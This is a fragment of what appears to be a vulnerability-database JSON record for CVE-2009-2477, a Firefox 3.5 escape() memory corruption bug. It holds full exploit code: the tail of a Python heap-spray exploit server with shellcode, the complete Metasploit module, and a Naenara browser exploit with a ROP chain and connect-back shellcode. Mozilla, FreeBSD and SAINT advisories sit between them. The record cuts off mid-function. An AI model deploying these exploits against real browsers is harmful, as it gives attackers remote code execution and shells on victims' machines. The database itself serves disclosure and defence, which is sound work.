+\r\n\t\t\t\"%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01\" +\r\n\t\t\t\"%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b\" +\r\n\t\t\t\"%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff\" +\r\n\t\t\t\"%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9\" +\r\n\t\t\t\"%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff%u6866%u7c15%u5366%ue189\" +\r\n\t\t\t\"%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue92e%uff57%u53d6\" +\r\n\t\t\t\"%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue768%uc679%u5779\" +\r\n\t\t\t\"%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a%u2959%u89cc%u6ae7%u8944\" +\r\n\t\t\t\"%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab%u7268%ub3fe%uff16\" +\r\n\t\t\t\"%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce\" +\r\n\t\t\t\"%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff%uff52%u68d0%uceef%u60e0\" +\r\n\t\t\t\"%uff53%uffd6%u41d0\");\r\noneblock = unescape(\"%u0c0c%u0c0c\");\r\nvar fullblock = oneblock;\r\nwhile (fullblock.length<0x60000) \r\n{\r\n fullblock += fullblock;\r\n}\r\nsprayContainer = new Array();\r\nfor (i=0; i<600; i++) \r\n{\r\n sprayContainer[i] = fullblock + shellcode;\r\n}\r\nvar searchArray = new Array()\r\n \r\nfunction escapeData(data)\r\n{\r\n var i;\r\n var c;\r\n var escData='';\r\n for(i=0;i<data.length;i++)\r\n {\r\n c=data.charAt(i);\r\n if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);\r\n escData+=c;\r\n }\r\n return escData;\r\n}\r\nfunction DataTranslator(){\r\n searchArray = new Array();\r\n searchArray[0] = new Array();\r\n searchArray[0][\"str\"] = \"blah\";\r\n var newElement = document.getElementById(\"content\")\r\n if (document.getElementsByTagName) {\r\n var i=0;\r\n pTags = newElement.getElementsByTagName(\"p\")\r\n if (pTags.length > 0) \r\n while (i<pTags.length)\r\n {\r\n oTags = pTags[i].getElementsByTagName(\"font\")\r\n searchArray[i+1] = new Array()\r\n if (oTags[0]) \r\n {\r\n searchArray[i+1][\"str\"] = oTags[0].innerHTML;\r\n }\r\n i++\r\n }\r\n }\r\n}\r\n \r\nfunction GenerateHTML()\r\n{\r\n var html = \"\";\r\n for (i=1;i<searchArray.length;i++)\r\n {\r\n html += escapeData(searchArray[i][\"str\"])\r\n } \r\n}\r\nDataTranslator();\r\nGenerateHTML()\r\n</script>\r\n</body>\r\n</html>\"\"\")\r\n print (\"\\n\\n[-] Exploit sent... [-]\\n[-] Wait about 30 seconds and attempt to connect.[-]\\n[-] Connect to IP Address: %s and port 5500 [-]\" % (target))\r\n\r\n def printCustomHTTPResponse(self, respcode):\r\n self.send_response(respcode)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.send_header(\"Server\", \"myRequestHandler\")\r\n self.end_headers()\r\n\r\nhttpd = HTTPServer(('', 80), myRequestHandler)\r\n\r\nprint (\"\"\"\r\n#######################################################\r\n#\r\n# FireFox 3.5 Heap Spray\r\n# Originally discovered by: Simon Berry-Bryne\r\n# Pythonized: David Kennedy (ReL1K) @ SecureState\r\n#\r\n#######################################################\r\n\"\"\")\r\nprint (\"Listening on port 80.\")\r\nprint (\"Have someone connect to you.\")\r\nprint (\"\\nType <control>-c to exit..\")\r\ntry:\r\n httpd.handle_request()\r\n httpd.serve_forever() \r\nexcept KeyboardInterrupt:\r\n print (\"\\n\\nExiting exploit...\\n\\n\")\r\n sys.exit(1)\r\n\r\n# milw0rm.com [2009-07-17]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9181/"}], "canvas": [{"lastseen": "2019-05-29T17:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "description": "**Name**| firefox_35 \n---|--- \n**CVE**| CVE-2009-2477 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Firefox 3.5 Remote Code Execution \n**Notes**| CVE Name: CVE-2009-2477 \nVENDOR: Mozilla \nNotes: Although the advisories states that this due to improper handling of and \n\ntags, this exploit uses another method to reach the \nvulnerability. For now - if the target browser is closed then the socket is lost - so you might want to install a MOSDEF service as soon as you can. This version is not yet \nDEP safe. \nRepeatability: One shot \nCVE Url: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2477 \nCVSS: 9.3 \n\n", "edition": 2, "modified": "2009-07-15T15:30:00", "published": "2009-07-15T15:30:00", "id": "FIREFOX_35", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/firefox_35", "title": "Immunity Canvas: FIREFOX_35", "type": "canvas", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-07-24T20:18:55", "description": "This module exploits a memory corruption vulnerability in the Mozilla Firefox browser. This flaw occurs when a bug in the javascript interpreter fails to preserve the return value of the escape() function and results in uninitialized memory being used instead. This module has only been tested on Windows, but should work on other platforms as well with the current targets.\n", "published": "2009-07-14T21:59:35", "type": "metasploit", "title": "Firefox 3.5 escape() Return Value Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/MULTI/BROWSER/FIREFOX_ESCAPE_RETVAL", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n #\n # This module acts as an HTTP server\n #\n include Msf::Exploit::Remote::HttpServer::HTML\n\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n # :ua_name => HttpClients::FF,\n # :ua_minver => \"3.5\",\n # :ua_maxver => \"3.5\",\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :javascript => true,\n # :rank => NormalRanking, # reliable memory corruption\n # :vuln_test => nil,\n #})\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Firefox 3.5 escape() Return Value Memory Corruption',\n 'Description' => %q{\n This module exploits a memory corruption vulnerability in the Mozilla\n Firefox browser. This flaw occurs when a bug in the javascript interpreter\n fails to preserve the return value of the escape() function and results in\n uninitialized memory being used instead. This module has only been tested\n on Windows, but should work on other platforms as well with the current\n targets.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Simon Berry-Byrne <x00050876[at]itnet.ie>', # Author / Publisher / Original exploit\n 'hdm', # Metasploit conversion\n ],\n 'References' =>\n [\n ['CVE', '2009-2477'],\n ['OSVDB', '55846'],\n ['BID', '35660'],\n ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=503286']\n ],\n 'Payload' =>\n {\n 'Space' => 1000 + (rand(256).to_i * 4),\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => %w{ win osx },\n 'Targets' =>\n [\n [ 'Firefox 3.5.0 on Windows XP SP0-SP3',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Ret' => 0x0c0c0c0c,\n 'BlockLen' => 0x60000,\n 'Containers' => 800,\n }\n ],\n [ 'Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n 'Ret' => 0x41414141,\n 'BlockLen' => 496,\n 'Containers' => 800000\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jul 13 2009'\n ))\n end\n\n\n def on_request_uri(cli, request)\n\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n print_status(\"Sending #{self.name}\")\n send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html; charset=utf-8' })\n handler(cli)\n end\n\n def generate_html(payload)\n\n enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))\n enc_ret = Rex::Text.to_unescape(\n Rex::Arch.endian(target.arch) == ENDIAN_LITTLE ? [target.ret].pack('V') : [target.ret].pack('N')\n )\n\n var_data_str1 = Rex::Text.rand_text_alpha(3)\n var_data_str2 = Rex::Text.rand_text_alpha(4)\n js = <<-EOF\nvar xunescape = unescape;\nvar shellcode = xunescape(\"#{enc_code}\");\n\noneblock = xunescape(\"#{enc_ret}\");\n\nvar fullblock = oneblock;\nwhile (fullblock.length < #{target['BlockLen']})\n{\n fullblock += fullblock;\n}\n\nvar sprayContainer = new Array();\nvar sprayready = false;\nvar sprayContainerIndex = 0;\n\nfunction fill_function()\n{\n if(! sprayready) {\n for (xi=0; xi<#{target['Containers']}/100; xi++, sprayContainerIndex++)\n {\n sprayContainer[sprayContainerIndex] = fullblock + shellcode;\n }\n } else {\n DataTranslator();\n GenerateHTML();\n }\n if(sprayContainer.length >= #{target['Containers']}) {\n sprayready = true;\n }\n}\n\nvar searchArray = new Array();\n\nfunction escapeData(data)\n{\n var xi;\n var xc;\n var escData='';\n for(xi=0; xi<data.length; xi++)\n {\n xc=data.charAt(xi);\n if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc);\n escData+=xc;\n }\n return escData;\n}\n\nfunction DataTranslator()\n{\n searchArray = new Array();\n searchArray[0] = new Array();\n searchArray[0][\"#{var_data_str1}\"] = \"#{var_data_str2}\";\n var newElement = document.getElementById(\"content\");\n if (document.getElementsByTagName) {\n var xi=0;\n pTags = newElement.getElementsByTagName(\"p\");\n if (pTags.length > 0)\n while (xi < pTags.length)\n {\n oTags = pTags[xi].getElementsByTagName(\"font\");\n searchArray[xi+1] = new Array();\n if (oTags[0]) {\n searchArray[xi+1][\"#{var_data_str1}\"] = oTags[0].innerHTML;\n }\n xi++;\n }\n }\n}\n\nfunction GenerateHTML()\n{\n var xhtml = \"\";\n for (xi=1;xi<searchArray.length;xi++)\n {\n xhtml += escapeData(searchArray[xi][\"#{var_data_str1}\"]);\n }\n}\n\nsetInterval(\"fill_function()\", .5);\nEOF\n\n # Obfuscate it up a bit\n js = obfuscate_js(js, 'Symbols' => {\n 'Variables' => %W{ DataTranslator GenerateHTML escapeData xunescape\n shellcode oneblock fullblock sprayContainer xi searchArray xc\n escData xhtml pTags oTags newElement sprayready sprayContainerIndex\n fill_function }\n }).to_s\n\n str1 = Rex::Text.rand_text_alpha(20)\n str2 = Rex::Text.rand_text_alpha(24)\n str3 = Rex::Text.rand_text_alpha(10) + \" \"\n\n return %Q^\n<html>\n<head>\n<div id=\"content\">\n<p>\n<FONT>\n</FONT>\n</p>\n<p>\n<FONT>#{str1}</FONT></p>\n<p>\n<FONT>#{str2}</FONT>\n</p>\n<p>\n<FONT>#{str3}</FONT>\n</p>\n</div>\n<script language=\"JavaScript\">\n#{js}\n</script>\n</body>\n</html>\n^\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/firefox_escape_retval.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2009-2477"], "description": "Mozilla Foundation Security Advisory 2009-41\r\n\r\nTitle: Corrupt JIT state after deep return from native function\r\nImpact: Critical\r\nAnnounced: July 16, 2009\r\nReporter: zbyte\r\nProducts: Firefox 3.5\r\n\r\nFixed in: Firefox 3.5.1\r\nDescription\r\n\r\nFirefox user zbyte reported a crash that we determined could result in an exploitable memory corruption problem. In certain cases after a return from a native function, such as escape(), the Just-in-Time (JIT) compiler could get into a corrupt state. This could be exploited by an attacker to run arbitrary code such as installing malware.\r\n\r\nWe would like to thank community members Lucas Kruijswijk and Nochum Sossonko for isolating the problematic script from the original crashing site.\r\n\r\nThis vulnerability does not affect earlier versions of Firefox which do not support the JIT feature.\r\nWorkaround\r\n\r\nUsers of Firefox 3.5 can avoid this vulnerability by disabling the Just-in-Time compiler as described in the Mozilla Security Blog. That workaround is not necessary in Firefox 3.5.1 and can be reverted.\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=503286\r\n * Critical JavaScript vulnerability in Firefox 3.5, Mozilla Security Blog\r\n * CVE-2009-2477\r\n", "edition": 1, "modified": "2009-07-22T00:00:00", "published": "2009-07-22T00:00:00", "id": "SECURITYVULNS:DOC:22196", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22196", "title": "Mozilla Foundation Security Advisory 2009-41", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-2477", "CVE-2009-2469", "CVE-2009-1194", "CVE-2009-2464", "CVE-2009-2472", "CVE-2009-2467", "CVE-2009-2463", "CVE-2009-2471", "CVE-2009-2462", "CVE-2009-2465"], "description": "Multiple memory corruptions, crossite access, integer overflows, buffer overflows.", "edition": 1, "modified": "2009-07-22T00:00:00", "published": "2009-07-22T00:00:00", "id": "SECURITYVULNS:VULN:10089", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10089", "title": "Multiple Mozilla Firefox security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:13", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477"], "description": "\nMozilla Project reports:\n\nFirefox user zbyte reported a crash that we determined could result\n\t in an exploitable memory corruption problem. In certain cases after a\n\t return from a native function, such as escape(), the Just-in-Time\n\t (JIT) compiler could get into a corrupt state. This could be exploited\n\t by an attacker to run arbitrary code such as installing malware.\nThis vulnerability does not affect earlier versions of Firefox\n\t which do not support the JIT feature.\n\n", "edition": 4, "modified": "2010-05-02T00:00:00", "published": "2009-07-16T00:00:00", "id": "C1EF9B33-72A6-11DE-82EA-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/c1ef9b33-72a6-11de-82ea-0030843d3802.html", "title": "mozilla -- corrupt JIT state after deep return from native function", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-05-29T17:19:51", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "edition": 2, "description": "Added: 07/13/2009 \nCVE: [CVE-2009-2477](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2477>) \nBID: [35660](<http://www.securityfocus.com/bid/35660>) \nOSVDB: [55846](<http://www.osvdb.org/55846>) \n\n\n### Background\n\n[Mozilla](<http://www.mozilla.org>) is a suite of Internet client products available for multiple platforms. \n\n### Problem\n\nA memory corruption vulnerability in Mozilla Firefox in the way it handles JIT escape function calls allows arbitrary code injection and execution when a user loads a malicious web page. \n\n### Resolution\n\n[Upgrade](<http://www.mozilla.com/firefox/>) to Firefox 3.5.1 or higher. \n\n### References\n\n<http://www.mozilla.org/security/announce/2009/mfsa2009-41.html> \n\n\n### Limitations\n\nThe target Windows XP system must have at least 1G virtual memory allocated. The target Linux system must have at least 2G physical memory. Exploit works on Firefox 3.5. In order for exploitation to succeed, a user must load the exploit in a vulnerable browser. \n\nAfter a user loads the exploit page, there may be a delay before the exploit succeeds. \n\n### Platforms\n\nWindows XP \nLinux \nMac OS X \n \n\n", "modified": "2009-07-13T00:00:00", "published": "2009-07-13T00:00:00", "id": "SAINT:79C3307CF1A514410E9FEAEBB6F7E752", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/firefox_jitescapefunction_memory_corruption", "type": "saint", "title": "Mozilla Firefox JIT Escape Function Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "description": "Added: 07/13/2009 \nCVE: [CVE-2009-2477](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2477>) \nBID: [35660](<http://www.securityfocus.com/bid/35660>) \nOSVDB: [55846](<http://www.osvdb.org/55846>) \n\n\n### Background\n\n[Mozilla](<http://www.mozilla.org>) is a suite of Internet client products available for multiple platforms. \n\n### Problem\n\nA memory corruption vulnerability in Mozilla Firefox in the way it handles JIT escape function calls allows arbitrary code injection and execution when a user loads a malicious web page. \n\n### Resolution\n\n[Upgrade](<http://www.mozilla.com/firefox/>) to Firefox 3.5.1 or higher. \n\n### References\n\n<http://www.mozilla.org/security/announce/2009/mfsa2009-41.html> \n\n\n### Limitations\n\nThe target Windows XP system must have at least 1G virtual memory allocated. The target Linux system must have at least 2G physical memory. Exploit works on Firefox 3.5. In order for exploitation to succeed, a user must load the exploit in a vulnerable browser. \n\nAfter a user loads the exploit page, there may be a delay before the exploit succeeds. \n\n### Platforms\n\nWindows XP \nLinux \nMac OS X \n \n\n", "edition": 1, "modified": "2009-07-13T00:00:00", "published": "2009-07-13T00:00:00", "id": "SAINT:F7D0051E55E1A2E3BD0584B843CFE221", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/firefox_jitescapefunction_memory_corruption", "type": "saint", "title": "Mozilla Firefox JIT Escape Function Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "description": "Added: 07/13/2009 \nCVE: [CVE-2009-2477](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2477>) \nBID: [35660](<http://www.securityfocus.com/bid/35660>) \nOSVDB: [55846](<http://www.osvdb.org/55846>) \n\n\n### Background\n\n[Mozilla](<http://www.mozilla.org>) is a suite of Internet client products available for multiple platforms. \n\n### Problem\n\nA memory corruption vulnerability in Mozilla Firefox in the way it handles JIT escape function calls allows arbitrary code injection and execution when a user loads a malicious web page. \n\n### Resolution\n\n[Upgrade](<http://www.mozilla.com/firefox/>) to Firefox 3.5.1 or higher. \n\n### References\n\n<http://www.mozilla.org/security/announce/2009/mfsa2009-41.html> \n\n\n### Limitations\n\nThe target Windows XP system must have at least 1G virtual memory allocated. The target Linux system must have at least 2G physical memory. Exploit works on Firefox 3.5. In order for exploitation to succeed, a user must load the exploit in a vulnerable browser. \n\nAfter a user loads the exploit page, there may be a delay before the exploit succeeds. \n\n### Platforms\n\nWindows XP \nLinux \nMac OS X \n \n\n", "edition": 4, "modified": "2009-07-13T00:00:00", "published": "2009-07-13T00:00:00", "id": "SAINT:C17E7E1CCDF4A2472D0ABE5E701B087C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/firefox_jitescapefunction_memory_corruption", "title": "Mozilla Firefox JIT Escape Function Memory Corruption", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-06T03:37:46", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-12-19T00:00:00", "type": "zdt", "title": "Naenara Browser 3.5 (RedStar 3.0 Desktop) - JACKRABBIT Client-Side Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "modified": "2016-12-19T00:00:00", "href": "https://0day.today/exploit/description/26548", "id": "1337DAY-ID-26548", "sourceData": "<!-- \r\nDownload: https://github.com/HackerFantastic/Public/blob/master/exploits/jackrabbit.tgz\r\nMirror: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40936.tgz\r\n-->\r\n \r\n<html>\r\n<head>\r\n<div id=\"content\">\r\n<p>\r\n<FONT>\r\n</FONT>\r\n</p>\r\n<p>\r\n<FONT>n0m3rcYn0M3rCyn0m3Rc</FONT></p>\r\n<p>\r\n<FONT>N0MeRCYn0m3rCyn0m3rCyn0m</FONT>\r\n</p>\r\n<p>\r\n<FONT>n0MERCypDK </FONT>\r\n</p>\r\n</div>\r\n<script language=\"JavaScript\">\r\nvar xunescape = unescape;\r\noneblock = xunescape(\"%u0040%u1000\");\r\nstackpivot = xunescape(\"%u6885%u0805%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u5a91%u0805%u4141%u4141\");\r\nnopsled = xunescape(\"%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568\"); \r\n \r\nropgadget = xunescape(\"%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000\")\r\n \r\n<!-- connect back (\"192.168.0.10,80\") ffff = port, 01020304 = ipaddr \"%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%u0168%u0302%u6604%uff68%u43ff%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061\" -->\r\n \r\nshellcode = xunescape(\"%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%uc068%u00a8%u660a%u0068%u4350%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061\");\r\n \r\n \r\nvar fullblock = oneblock; \r\nwhile (fullblock.length < 393216)\r\n{\r\n fullblock += fullblock;\r\n}\r\n \r\nvar sprayContainer = new Array();\r\nvar sprayready = false;\r\nvar sprayContainerIndex = 0;\r\n \r\nfunction fill_function()\r\n{\r\n if(! sprayready) {\r\n for (xi=0; xi<800/100; xi++, sprayContainerIndex++)\r\n {\r\n sprayContainer[sprayContainerIndex] = fullblock + stackpivot + oneblock + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + ropgadget + shellcode;\r\n }\r\n } else {\r\n DataTranslator();\r\n GenerateHTML();\r\n }\r\n if(sprayContainer.length >= 1000) {\r\n sprayready = true;\r\n }\r\n}\r\n \r\nvar searchArray = new Array();\r\n \r\nfunction escapeData(data)\r\n{\r\n var xi;\r\n var xc;\r\n var escData='';\r\n for(xi=0; xi<data.length; xi++)\r\n {\r\n xc=data.charAt(xi);\r\n if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc);\r\n escData+=xc;\r\n }\r\n return escData;\r\n}\r\n \r\nfunction DataTranslator()\r\n{\r\n searchArray = new Array();\r\n searchArray[0] = new Array();\r\n searchArray[0][\"dac\"] = \"Kros\";\r\n var newElement = document.getElementById(\"content\");\r\n if (document.getElementsByTagName) {\r\n var xi=0;\r\n pTags = newElement.getElementsByTagName(\"p\");\r\n if (pTags.length > 0)\r\n while (xi < pTags.length)\r\n {\r\n oTags = pTags[xi].getElementsByTagName(\"font\");\r\n searchArray[xi+1] = new Array();\r\n if (oTags[0]) {\r\n searchArray[xi+1][\"dac\"] = oTags[0].innerHTML;\r\n }\r\n xi++;\r\n }\r\n }\r\n}\r\n \r\nfunction GenerateHTML()\r\n{\r\n var xhtml = \"\";\r\n for 